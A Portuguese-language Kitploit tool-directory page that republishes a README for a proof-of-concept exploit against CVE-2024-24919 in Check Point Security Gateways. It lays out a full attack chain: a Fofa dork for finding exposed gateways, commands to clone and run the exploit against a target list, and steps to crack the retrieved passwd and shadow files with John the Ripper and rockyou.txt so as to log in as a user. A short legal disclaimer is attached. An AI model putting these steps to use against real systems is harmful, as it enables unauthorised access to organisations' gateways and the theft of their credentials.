Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-24919 — Prova de Conceito - CVE-2024–24919 - Check Point Security Gateways | Kitploit
Ferramentas/GitHubGitHub/verylazytech/cve-2024-24919
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubverylazytech/cve-2024-24919

CVE-2024-24919

Prova de Conceito - CVE-2024–24919 - Check Point Security Gateways

Ver Repositório
935há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

Divulgação de Informações em Check Point Security Gateways - CVE-2024-24919

My Shop Medium Github Buy Me A Coffee

Potencialmente permitindo que um atacante leia certas informações em Check Point Security Gateways uma vez conectado à internet e com as Blades de Acesso Remoto VPN ou Acesso Móvel ativadas. Uma correção de segurança que mitiga esta vulnerabilidade está disponível.

Leia sobre — CVE-2024-24919

Aviso: Esta Prova de Conceito (POC) é feita apenas para fins educacionais e de teste ético. O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. É responsabilidade do usuário final obedecer a todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado por este programa.

Começando

Encontrando Alvos

Para encontrar alvos potenciais, use o Fofa (semelhante ao Shodan.io):

  • Fofa Dork: app=”Check_Point-SSL-Network-Extender”

Alt text

Primeiro, clone o repositório:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-24919

Em seguida, escolha seu alvo e adicione-o ao arquivo list.txt neste formato:

  • https://ip_address

Execute o Exploit:

root@kitploit:~
python3 CVE-2024-24919.py -l list.txt

Agora existem 2 opções de saída:

Sem sucesso:

Alt text

Com sucesso:

Alt text

Agora, depois de encontrar os arquivos passwd e shadow, você pode tentar quebrar o hash com o JohnTheRipper. Após executar o exploit, você terá 2 arquivos, passwd e shadow, então você pode mesclá-los em um único arquivo e tentar quebrá-los (usei rockyou.txt, mas pode ser qualquer lista de palavras de senha):

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Alt text

E agora, depois de quebrarmos o hash, podemos fazer login no usuário!

Baixar ferramenta